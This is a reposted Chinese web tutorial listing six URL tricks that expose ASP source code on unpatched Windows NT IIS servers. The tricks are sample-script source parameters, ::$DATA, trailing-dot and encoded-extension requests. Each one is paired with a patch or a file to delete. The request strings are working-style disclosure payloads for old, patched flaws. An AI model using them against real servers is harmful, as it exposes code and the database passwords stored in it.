欢迎光临
我们一直在努力

偷看ASP原码的6种方法-ASP教程,脚本编码

建站超值云服务器,限时71元/月

在没有打services pack6补丁的nt server上,至少有6种方法可以看到asp程序的源代码,它们是:

1、http://www.someserver.com/msadc/samples/selector/showcode.asp?source=/msadc/samples/selector/showcode.asp

解决方案:删除showcode.asp

2、http://somewhere/something.asp::$data

解决方案: 装sp3

3、http://somewhere/something.asp%2e

解决方案: 装sp4

or http://somewhere/something.asp.(加一个点)

解决方案: 装sp4

4、http://somewhere/something%2e%41sp

或者 http://somewhere/something%2e%asp

解决方案: 装sp4

5、http://somewhere/something.asp%81

解决方案:装sp6或者打补丁

6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp

最大的危害莫过于asp文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;

赞(0)
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com 特别注意:本站所有转载文章言论不代表本站观点! 本站所提供的图片等素材,版权归原作者所有,如需使用,请与原作者联系。未经允许不得转载:IDC资讯中心 » 偷看ASP原码的6种方法-ASP教程,脚本编码
分享到: 更多 (0)